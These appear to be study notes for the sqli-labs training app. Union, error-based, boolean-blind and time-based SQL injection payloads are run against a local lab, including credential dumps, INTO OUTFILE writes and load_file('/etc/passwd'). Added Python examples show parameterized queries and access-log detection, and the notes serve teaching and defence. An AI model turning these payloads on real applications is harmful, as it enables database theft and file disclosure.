SQLi Lab: 1
url : http://localhost/sqli/Less-1/
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1%27%20--+
' (single quote) = %27
space = %20
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1'
http://localhost/sqli/Less-1/?id=1'space
http://localhost/sqli/Less-1/?id=1' --=
http://localhost/sqli/Less-1/?id=1' --+
http://localhost/sqli/Less-1/?id=1"
http://localhost/sqli/Less-1/?id=1" --+
http://localhost/sqli/Less-1/?id=1" --=
http://localhost/sqli/Less-1/?id=1" --+
To find out the number of columns in the query, we use “order by”
http://localhost/sqli/Less-1/?id=1 order by 9 --+ → Unknown column '9'
http://localhost/sqli/Less-1/?id=1 order by 5 --+ → Unknown column '5'
http://localhost/sqli/Less-1/?id=1 order by 4 --+ → Unknown column '4'
http://localhost/sqli/Less-1/?id=1 order by 3 --+ → “success”
Result: Total 3 columns
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+
Union: union works only when both selects have the same number of columns; otherwise an error is displayed.
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+ → the result displayed is still the original row (id=1)
http://localhost/sqli/Less-1/?id=23451' union select 1,2,3 --+ → to get past the original row's result we change the id to a value that does not exist in the table
http://localhost/sqli/Less-1/?id=14' union select 1,2,3 --+ → we get results up to id 14, which means there are only 14 rows (id values)
http://localhost/sqli/Less-1/?id=15' union select 1,2,3 --+ → from id 15 onwards the 2nd and 3rd columns of our union select are displayed instead
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),3 --+ → we injected version() in the 2nd position and got 5.5.59-0ubuntu0.14.04.1
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),database() --+ → to learn the database name we injected database() and got security
information_schema holds the metadata of all databases, tables and columns.
TABLE_SCHEMA = database name
TABLE_NAME = table name of the database
COLUMN_NAME = column name of the table
so here the query will be,
select TABLE_NAME from information_schema.COLUMNS where TABLE_SCHEMA='security';
http://localhost/sqli/Less-1/?id=15' union select 1,(select TABLE_NAME from Information_schema.COLUMNS where TABLE_SCHEMA='security'),version() --+ → result: subquery returns more than 1 row
http://localhost/sqli/Less-1/?id=23451' union select 1,user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,system_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,current_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,schema(),session_user() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+ → displays one of the table names
to step through the table names one at a time we use limit,
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 --+ → result of 1st table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1 --+ → result of 2nd table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 --+ → result of 3rd table name
instead of finding the table names separately, we can use group_concat to display them all in one statement,
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ → we get all the tables, listed below,
Table name: email, referers, uagents, users
Database name: security
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),group_concat(password) from users --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),3 from users --+
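The Lab 1 and Lab 2 findings come down to one bug: the id parameter is pasted into the SQL text. The Python/SQLite block below is an added example, not code from the notes or from sqli-labs: it re-creates that query shape over constructed sample rows, runs the same kinds of probes, and puts the parameterized form beside it. It assumes SQLite can stand in for MySQL for these probes (sqlite_version() replaces version()).

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table.
SAMPLE_USERS = [
    (1, "alice", "alice-pass"),
    (2, "bob", "bob-pass"),
    (3, "carol", "carol-pass"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_concatenated(conn, user_id: str):
    """Less-1 shape: the request value is pasted between single quotes.
    The closing quote, an ORDER BY / UNION tail and the trailing comment all
    come from the caller, so the developer's LIMIT 0,1 is commented away."""
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_numeric_concatenated(conn, user_id: str):
    """Less-2 shape: no quotes at all, so no quote is needed to break out."""
    sql = f"SELECT id, username, password FROM users WHERE id={user_id} LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id: str):
    """The fix: the value is bound as data. Whatever it contains, it is compared
    against the id column as a whole and can never extend the statement."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn, lookup, user_id: str):
    """Run one lookup and report (rows, error) the way the lab page shows it:
    a non-None error means the database complained, as with 'order by 4'."""
    try:
        return lookup(conn, user_id), None
    except sqlite3.Error as exc:
        return [], str(exc)


PROBES = [
    "1",                                               # legitimate request
    "1' order by 4 -- ",                               # column counting: error => fewer than 4 columns
    "1' order by 3 -- ",                               # no error => 3 columns
    "1' AND 0 -- ",                                    # boolean probe: the row disappears
    "23451' union select 1,sqlite_version(),'x' -- ",  # non-existent id: the union row is shown instead
]

if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("concatenated", lookup_concatenated), ("parameterized", lookup_parameterized)):
        print(f"--- {name} ---")
        for p in PROBES:
            rows, err = probe(conn, fn, p)
            print(f"{p!r:55} -> rows={rows} error={err}")
    # Less-2 style numeric context: the quote is irrelevant, the concatenation is the bug.
    print(probe(conn, lookup_numeric_concatenated, "-1 union select 1,sqlite_version(),'x'"))
```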
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 2
Url: http://localhost/sqli/Less-2/
http://localhost/sqli/Less-2/?id=0 → no result
http://localhost/sqli/Less-2/?id=1 → result
http://localhost/sqli/Less-2/?id=12 → result
http://localhost/sqli/Less-2/?id=13 → no result; results up to 12, which means 12 records are available
http://localhost/sqli/Less-2/?id=nesdfs → no result
http://localhost/sqli/Less-2/?id=ndfs1234 → no result
http://localhost/sqli/Less-2/?id=10938429379845 → no result
http://localhost/sqli/Less-2/?id=1\ → '\ LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1' → got an error from MYSQL, '' LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1'spacespace → error not fixed
http://localhost/sqli/Less-2/?id=1' --+ → error not fixed
http://localhost/sqli/Less-2/?id=1' --= → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or '1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1='1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1'=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' # → error not fixed
since the developer did not wrap the id in a single quote ('), a double quote (") or brackets ( ), we can inject directly
localhost/sqli/Less-2/?id=-1 union select 1,database(),version() → injection worked
the rest of the information is enumerated as above.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 3
URL: 192.168.93.156/sqli/Less-3/?id=1
' ' 1' ') LIMIT 0,1 '
' ' 1\ ') LIMIT 0,1 '
' ') LIMIT 0,1 '
http://192.168.93.156/sqli/Less-3/?id=1') --> breaks the query
http://192.168.93.156/sqli/Less-3/?id=1') --+ --> fixes the broken query
http://192.168.93.156/sqli/Less-3/?id=1') order by 4 --+ --> Unknown column '4' in 'order clause'
http://192.168.93.156/sqli/Less-3/?id=1') order by 3 --+ --> Results are displayed
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,5,4 --+
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,database(),version() --+
database name = security
sql version = 5.5.59-0ubuntu0.14.04.1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 4
URL: http://192.168.93.156/sqli/Less-4/?id=1"
http://192.168.93.156/sqli/Less-4/?id=1" --> Broken the code
' " 1" ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") --> Broken the code
' ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") or (" --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1")--+ --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1") union select 1,2,3,4 or (" --> SELECT statements have a different number of columns
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,55,378 or (" --> 2nd column is displayed
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,2,3 --+ --> 2nd and 3rd columns are displayed
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 5
URL: http://192.168.93.156/sqli/Less-5/?id=1
http://192.168.93.156/sqli/Less-5/?id=1' --> the query breaks on ['], so it is injectable; the error shows [''1'' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1" --> page displays normally, so it is not injectable via ["]
http://192.168.93.156/sqli/Less-5/?id=1\ --> the query breaks on [\], so it is injectable; the error shows [''1\' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1\ --+ --> query fixed by commenting out the rest [--]
http://192.168.93.156/sqli/Less-5/?id=1' --+ --> query fixed by commenting out the rest [--]
http://192.168.93.156/sqli/Less-5/?id=1' '1 --> query fixed by closing the quote
http://192.168.93.156/sqli/Less-5/?id=1' order by 1 and '1 --> to find the column count we tried "order by", but it did not help
"Order by" does not work when you are not using comments. We have to go by trial and error.
http://192.168.93.156/sqli/Less-5/?id=1' union select 1 and '1 --> doesn't work
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2 and '1 --> doesn't work
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3 and '1 --> works, which means the query has 3 columns
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3,4 and '1 --> doesn't work
Developer's query is,
select col1, col2, col3 from table_name where id='$your_input';
Since no query output is displayed and we only see output in the form of SQL errors, if we can produce a MySQL error in a controlled way we can extract the information required for enumeration.
select count(*) from information_schema.tables;
select rand();
select floor(2.4536759379374);
select floor(rand()*2);
here the column title shows the expression we provided; we can give it an alias.
select floor(rand()*2)as dump; [or]
select floor(rand()*2)dump;
useful: select table_name, table_schema from information_schema.tables group by table_schema;
select database();
select (select database());
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a); --> 0x3a is the hex value of ':'
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)as aaa; --> alias set to aaa
select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa; --> added some randomness with the floor function
select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.tables;
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> After a few tries we get an error message. This error is generated by the randomness and it dumped as "Database: 'security'"
select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> It dumped as "Database version: 5.1.62"
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays the second table name
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays the third table name
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays the first table name
(select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa)bbb);
By changing the limit values, we can get the name of the tables
To find out the column names,
(select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a, round(rand()*2,1))as aaa from information_schema.columns group by aaa)bbb);
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection:
localhost/sqli-labs/Less-5/?id=1
localhost/sqli-labs/Less-5/?id=2
localhost/sqli-labs/Less-5/?id=3
localhost/sqli-labs/Less-5/?id=1'
localhost/sqli-labs/Less-5/?id=1\
select col1,col2,col3 from table where id=' 1' OR '1 '
localhost/sqli-labs/Less-5/?id=1' --+
localhost/sqli-labs/Less-5/?id=1' #
There is no way to display the output of our query from the database. We have to create error messages in a controlled way to display output from the database; hence it is a semi-blind SQL injection.
some functions tried on the database,
mysql>select count(*) from information_schema.tables;
mysql>select count(*) from information_schema.columns;
mysql>select rand();
mysql>select rand()*4;
mysql>select floor(2.4536759379374);
mysql>select rand()*2;
mysql>select floor(rand()*2);
mysql>select floor(rand()*2)as dumb;
mysql>select floor(rand()*2)dumb;
mysql>select table_name,table_schema from information_schema.tables group by table_schema;
mysql>select database();
mysql>select (select database());
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a;
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns;
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables;
mysql>select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
--> error: subquery returns more than 1 row, because we did not add a LIMIT clause
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection: Continued...
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;
In the front end (the URL) the subquery must be wrapped in parentheses '()'
(select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a) ->> it gave an error, i.e., operand should contain 1 column
To fix the above query,
(select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)) --+
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
we can use the "round" function instead of floor,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, round(rand()*2,1))a from information_schema.columns group by a)b) --+
we can enumerate column names as well,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name="users" limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+ --> displays the name of the 1st column
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name="users" limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+ --> displays the name of the 2nd column
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Boolean Based
URL: localhost/sqli-labs/Less-8/?id=1
localhost/sqli-labs/Less-8/?id=1' --> didn't get a result
localhost/sqli-labs/Less-8/?id=1' --+ --> some results are displayed as expected
localhost/sqli-labs/Less-8/?id=1' AND 1 --+ --> displayed some results
localhost/sqli-labs/Less-8/?id=1' AND 0 --+ --> intentionally false condition, result as expected
If we inject a query we get nothing in the display, since it is a blind SQL injection; even errors are missing.
From backend database,
use security;
select database();
select length(database());
select substr(database(),1,1); --> substr takes 3 parameters: (string, start position, number of characters)
select ascii(substr(database(),1,1));
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),1,1)))=98 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>102 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>101 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
Tools such as Burp, ZAP and Fiddler can be used for the same.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Time Based
In previous lessons something was dumped on the screen, a visible sign that gave us an idea.
Here we have no such sign or differentiation.
From the backend database we learn the sleep() function,
mysql>use security;
mysql>select sleep(10); --> waits 10 seconds before returning the result
We use the time delay as the true/false signal.
mysql>select if(condition, value_if_true, value_if_false);
mysql>select if((select database())="security",sleep(10),null);
As there is no visible sign of the injection on the screen, we make use of the sleep() function.
From the application,
localhost/sqli-labs/Less-9/?id=1' and sleep(10) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select database())="security",sleep(10),null) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select version()) like "5%",sleep(10),null) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1),sleep(10),null) --+ --> it works
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database Using Outfile:
localhost/sqli-labs/Less-7/?id=1 --> Normal results displayed.
localhost/sqli-labs/Less-7/?id=7 --> No error
localhost/sqli-labs/Less-7/?id=50 --> Error message
localhost/sqli-labs/Less-7/?id=news --> Error message
localhost/sqli-labs/Less-7/?id=\ --> Error message
localhost/sqli-labs/Less-7/?id=1' --> Error message
localhost/sqli-labs/Less-7/?id=1" --> No Error message
localhost/sqli-labs/Less-7/?id=1' --+ --> Query not fixed
localhost/sqli-labs/Less-7/?id=1') --+ --> Query not fixed
localhost/sqli-labs/Less-7/?id=1')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=2')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')) (('1 --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')){execute command safely} --+ --> Query fixed
Database backend:
use security;
select * from users;
select * from users into outfile "/tmp/test.txt"; -->> dumps the complete result set into test.txt
select * from users into dumpfile "/tmp/test1.txt"; -->> error: dumpfile can write only a single row, no more
select * from users limit 0,1 into dumpfile "/tmp/test1.txt"; -->> error: dumpfile cannot overwrite an existing file
[mysql should not run with root privilege]
select load_file("/etc/passwd") into outfile "/tmp/test4.txt"; -->>
localhost/sqli-labs/Less-7/?id=1'))order by 4 --+ -->> displayed an error message
localhost/sqli-labs/Less-7/?id=1'))order by 3 --+ -->> no error displayed
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "/var/www/sqli-labs/Less-7/union1.txt" --+ -->>
localhost/sqli-labs/Less-7/union1.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1, database(),version() into outfile "/var/www/sqli-labs/Less-7/union2.txt" --+ -->>
localhost/sqli-labs/Less-7/union2.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),version() into outfile "/var/www/sqli-labs/Less-7/union3.txt" --+ -->>
localhost/sqli-labs/Less-7/union3.txt
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database:
localhost/sqli-labs/Less-7/?id=1')) --+
localhost/sqli-labs/Less-7/?id=1')) or (('1
will test from backend in the database,
mysql>use security;
mysql>show tables;
mysql>select * from users;
mysql>select * from users into outfile "/tmp/test.txt";
mysql>select * from users into dumpfile "/tmp/test1.txt";
mysql>select * from users limit 0,1 into dumpfile "/tmp/test1.txt";
mysql>select * from users limit 0,1 into dumpfile "/tmp/test2.txt";
Outfile: dumps the results of the query to a file.
Dumpfile: writes only one row to a file, and it cannot overwrite an existing file.
To work around this we use a limit clause.
load_file: reads a file from the filesystem into MySQL.
mysql>select load_file("/etc/passwd");
mysql>select load_file("/etc/passwd") into outfile "/tmp/test3.txt";
localhost/sqli-labs/Less-7/?id=1')) order by 3 --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "/tmp/test4.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,database(),version() into outfile "/var/www/sqli-labs/Less-7/union1.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables where table_schema='security' into outfile "/var/www/sqli-labs/Less-7/union2.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables into outfile "/var/www/sqli-labs/Less-7/union3.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,username,password from users into outfile "/var/www/sqli-labs/Less-7/union4.txt" --+
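All the GET-based probes in these notes (quote breakage, order by counting, union select, information_schema, the rand()/group by error trick, ascii(substr()), sleep(), into outfile) leave a recognisable trail in the web server's access log. The Python block below is an added example, not code from the notes or from sqli-labs: it decodes constructed combined-format log lines, tags each request with the probe family it belongs to, and summarises per client. The log lines and client addresses are constructed.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx combined-format request line: ip - - [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \d+$'
)

# Probe families from the labs, matched against the decoded, lower-cased query string.
SIGNATURES = {
    # a stray quote or a trailing comment: low confidence on its own, weighted by the summary
    "quote_or_comment": re.compile(r"['\"\\]|--(?:\s|$)|#"),
    "order_by_count": re.compile(r"\border\s+by\s+\d+"),                  # Lab 1/3/4 column counting
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),          # Labs 1 to 4, Less-7
    "schema_enum": re.compile(r"\binformation_schema\."),                  # table/column enumeration
    "rand_groupby_error": re.compile(r"(?:floor|round)\s*\(\s*rand\s*\(.*?\bgroup\s+by\b"),  # Lab 5
    "boolean_blind": re.compile(r"\bascii\s*\(\s*substr"),                 # Less-8
    "time_blind": re.compile(r"\bsleep\s*\(\s*\d+"),                       # Less-9
    # Less-7: INTO OUTFILE / LOAD_FILE need the FILE privilege and are confined by
    # MySQL's secure_file_priv setting; an empty secure_file_priv means no confinement.
    "file_access": re.compile(r"\binto\s+(?:out|dump)file\b|\bload_file\s*\("),
}

# Constructed sample log; the query strings mirror the probes used in these notes.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /sqli/Less-1/?id=1%27%20--+ HTTP/1.1" 200 498
10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /sqli/Less-1/?id=1%27%20order%20by%204%20--+ HTTP/1.1" 200 610
10.0.0.5 - - [12/Mar/2024:10:01:21 +0000] "GET /sqli/Less-1/?id=1%27%20order%20by%203%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [12/Mar/2024:10:01:40 +0000] "GET /sqli/Less-1/?id=23451%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+ HTTP/1.1" 200 640
10.0.0.9 - - [12/Mar/2024:10:05:00 +0000] "GET /sqli/Less-9/?id=1%27%20and%20sleep(10)%20--+ HTTP/1.1" 200 480
10.0.0.9 - - [12/Mar/2024:10:05:30 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))=98%20--+ HTTP/1.1" 200 480
10.0.0.9 - - [12/Mar/2024:10:06:00 +0000] "GET /sqli/Less-7/?id=1%27))%20union%20select%201,2,3%20into%20outfile%20%22/tmp/t.txt%22%20--+ HTTP/1.1" 200 480
10.0.0.7 - - [12/Mar/2024:10:07:00 +0000] "GET /sqli/Less-5/?id=1%27AND%20(select%201%20from%20(select%20count(*),concat(0x3a,0x3a,(select%20database()),0x3a,0x3a,floor(rand()*2))a%20from%20information_schema.columns%20group%20by%20a)b)%20--+ HTTP/1.1" 500 220
10.0.0.8 - - [12/Mar/2024:10:08:00 +0000] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 512
"""


def decode_query(path: str) -> str:
    """Query string as the database saw it: '+' and %20 become spaces, %27 a quote,
    whitespace collapsed, case folded.  A raw '#' typed in the address bar is a URL
    fragment and never reaches the server, so only %23 can show up here."""
    query = unquote_plus(urlsplit(path).query)
    return " ".join(query.split()).lower()


def classify(decoded_query: str) -> list:
    """Sorted list of probe families present in one decoded query string."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded_query))


def analyze(log_text: str) -> list:
    """Parse each log line and tag it; unparseable lines are skipped."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        decoded = decode_query(m.group("path"))
        findings.append({"ip": m.group("ip"), "status": m.group("status"),
                         "query": decoded, "tags": classify(decoded)})
    return findings


def summarize(findings: list) -> dict:
    """Per-client tag counts: a run of order_by_count followed by union_select is the
    column-counting-then-union escalation shown in Labs 1 to 4."""
    per_ip = defaultdict(Counter)
    for f in findings:
        for tag in f["tags"]:
            per_ip[f["ip"]][tag] += 1
    return dict(per_ip)


def suspicious_clients(findings: list, ignore=("quote_or_comment",)) -> set:
    """Clients with at least one high-confidence family (a lone quote is not enough)."""
    return {f["ip"] for f in findings if any(t not in ignore for t in f["tags"])}


if __name__ == "__main__":
    # The POST lessons (Less-12 to Less-17) carry the payload in the request body, which
    # an access log does not record; those need application-level or WAF logging instead.
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["status"], f["tags"], f["query"][:70])
    print(summarize(results))
    print("suspicious:", sorted(suspicious_clients(results)))
```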
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Error Based
localhost/sqli-labs/Less-12/
below are the test inputs to break the query,
'
"
''
""
')
")
\
below, to fix the broken query,
") --(space) OR ") # OR try ") --+
") or 1=1 #
") or 1=1 LIMIT 0,1 #
") or 1=1 LIMIT 1,1 #
") or 1=1 LIMIT 2,1 #
") or 1=1 LIMIT 3,1 #
to find out how many columns the developer's query uses, with "order by",
") order by 4 #
") order by 3 #
") order by 2 #
'""") and password=("") LIMIT 0,1'
'"\") and password=("") LIMIT 0,1'
select * from table where username=("$uname") and password=("$passwd") LIMIT 0,1
select col1, col2 from table where username=("$uname") and password=("$passwd") LIMIT 0,1
") union select 1,2 #
") union select database(),version() #
") union select 1,table_name from information_schema.tables where table_schema=database() #
") union select 1,table_name from information_schema.tables where table_schema=database() LIMIT 1,1 #
") union select 1,table_name from information_schema.tables where table_schema=database() LIMIT 2,1 #
") union select 1,table_name from information_schema.tables where table_schema=database() LIMIT 3,1 #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Double Query based
localhost/sqli-labs/Less-14/
try combinations of strings, numbers and special characters
9834756 --> failed login attempt
admin/admin --> failed login attempt
9849357/admin --> failed login attempt
admin/password --> failed login attempt
' --> didn't break the query
'/' --> didn't break the query
') --> didn't break the query
;)) --> didn't break the query
" --> success, breaks the query
" -- OR " # --> fixing the query
" # --> failed login attempt
" or 1=1 # --> successfully logged in
from database backend,
mysql>use security;
mysql>select database();
mysql>select concat((select database()));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2)) from information_schema.tables;
